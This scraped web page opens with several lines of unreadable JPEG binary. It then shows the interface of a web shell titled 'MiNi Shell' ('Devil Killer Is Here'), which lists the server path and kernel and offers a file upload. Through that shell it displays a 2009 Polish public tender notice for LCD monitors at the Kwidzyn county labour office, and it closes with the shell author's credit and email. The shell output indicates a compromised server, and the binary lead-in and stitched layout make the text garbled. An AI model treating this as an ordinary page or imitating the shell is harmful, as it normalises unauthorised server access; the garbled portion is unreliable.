JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090904/148117-N-2009.html

<p class="kh_header"><b>Kwidzyn: DOSTAWA DO POWIATOWEGO URZĘDU PRACY W KWIDZYNIE MONITORÓW EKRANOWYCH LCD</b><br>
<b>Numer ogłoszenia: 148117 - 2009; data zamieszczenia: 04.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Kwidzynie , ul. Grudziądzka 30, 82-500 Kwidzyn, woj. pomorskie, tel. 0-55 267 27 00, faks 0-55 267 27 01.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA DO POWIATOWEGO URZĘDU PRACY W KWIDZYNIE MONITORÓW EKRANOWYCH LCD.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa do Powiatowego Urzędu Pracy w Kwidzynie monitorów ekranowych LCD w ilości 50 sztuk monitorów LCD 19 cali i 1 sztuki monitora LCD 24 cale. Szczegółowy opis przedmiotu zamówienia określony został w Rozdziale II - Szczegółowy opis przedmiotu zamówienia - Specyfikacji Istotnych Warunków Zamówienia.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.23.13.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Na podstawie zapisów z SIWZ:
...6. OPIS WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW:
6.1 W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki:
6.1.1 posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
6.1.2 posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi
do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
6.1.3 znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
6.1.4 nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
6.2 Ponadto Zamawiający wymaga od Wykonawcy, który złoży ofertę doświadczenia nabytego w okresie ostatnich 3 lat
(a jeśli okres działalności Wykonawcy jest krótszy - to w tym krótszym okresie) w realizacji co najmniej trzech dostaw monitorów LCD o łącznej wartości brutto nie mniejszej niż 50.000,00 PLN, przy czym pod uwagę brane będą również takie dostawy, w których monitory LCD stanowiły tylko część dostawy, pod warunkiem, że z przedstawionych przez Wykonawcę dokumentów wynikać będzie jednoznacznie, iż łączna wartości brutto monitorów LCD będących częścią dostaw
jest nie mniejsza niż 50.000,00 PLN.
6.3 Zamawiający dokona oceny spełniania warunków na podstawie złożonych oświadczeń lub dokumentów opisanych
w pkt. 7 niniejszej Instrukcji, wg formuły - spełnia/nie spełnia....</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na podstawie zapisów z SIWZ:
...7. WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW, JAKIE MAJĄ DOSTRCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:
7.1 W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawcy muszą dostarczyć:
7.1.1 Oświadczenie Wykonawcy(ów) o spełnianiu warunków udziału w postępowaniu (wg wzoru określonego w Załącznik nr 1 do formularza oferty oraz dla członków konsorcjum Załącznik nr 1a do formularza oferty ).
7.1.2 Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.1.3 Wykaz potwierdzający doświadczenie w realizacji dostaw, o których mowa w pkt. 6.2, z podaniem
ich wartości, przedmiotu, dat wykonania i odbiorców, oraz   załączenia dokumentów potwierdzających, że dostawy
te zostały wykonane należycie (wg wzoru określonego w Załącznik nr 2 do formularza oferty Doświadczenie zawodowe). Dokumentami potwierdzającymi należyte wykonanie mogą być np.: protokół zdawczo-odbiorczy, referencje.
7.2 Pełnomocnictwo do reprezentowania Wykonawcy o ile ofertę składa pełnomocnik.
7.3 W przypadku, gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zastosowanie mają przepisy Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane
(Dz. U. Nr 87 poz. 605) oraz Rozporządzenia Prezesa Rady Ministrów z dnia 16 października 2008 r. zmieniające rozporządzenie w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich
te dokumenty mogą być składane (Dz.U Nr 188, poz. 1155) dla odpowiednich dokumentów jakie wymaga Zamawiający.
7.4 Zasady spełniania warunków udziału w postępowaniu przez podmioty występujące wspólnie:
7.4.1 Wykonawcy wspólnie (w ramach konsorcjum) ubiegający się o udzielenie zamówienia zobowiązani
są do ustanowienia pełnomocnika do reprezentowania wykonawców w postępowaniu o udzielenie zamówienia
albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i dołączają do oferty dokument Pełnomocnictwa podpisany przez wszystkich Wykonawców wspólnie ubiegających się o zamówienie.  Pełnomocnictwo to musi zostać dołączone do oferty i musi być złożone w formie oryginału lub odpisu notarialnego.
7.4.2 Wykonawcy wspólnie (w ramach konsorcjum) ubiegający się o udzielenie zamówienia zobowiązani są do złożenia oświadczenia wskazanego w pkt. 7.1.1. Zamawiający dopuszcza możliwość złożenia wspólnego oświadczenia przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia potwierdzającego, że razem spełniają warunki, o których mowa w art. 22 ust. 1 pkt 1-3 Pzp - tj. Załącznik nr 1 do formularza oferty. Oświadczenie dotyczące art. 22 ust. 1
pkt 4 Pzp, powinno być przedłożone i podpisane przez każdego członka Konsorcjum z osobna - Załącznik nr 1a
do formularza oferty.
7.4.3 Wymagane dokumenty wskazane w pkt. 7.1.2. winny być złożone przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
7.4.4 Wymagany wykaz i dokumenty wskazane w pkt. 7.1.3 winny być złożone przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, przy czym dokumenty te będą oceniane łącznie.
7.4.5 W przypadku wyboru oferty złożonej przez Wykonawców wspólnie (w ramach konsorcjum) ubiegających
się o udzielenie zamówienia, przed zawarciem umowy przedłożą oni Zamawiającemu umowę regulującą ich współpracę.
7.5 Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom (wpisać w tabelę w pkt. 13 w Formularzu oferty - wg wzoru określonego w Rozdział III SIWZ)....</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.pupkwidzyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem: Powiatowy Urząd Pracy w Kwidzynie, ul. Grudziądzka 30, 82-500 Kwidzyn, pok. 24 II piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2009 godzina 09:30, miejsce: Powiatowy Urząd Pracy w Kwidzynie, ul. Grudziądzka 30, 82-500 Kwidzyn, pokój 13 (sekretariat), I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com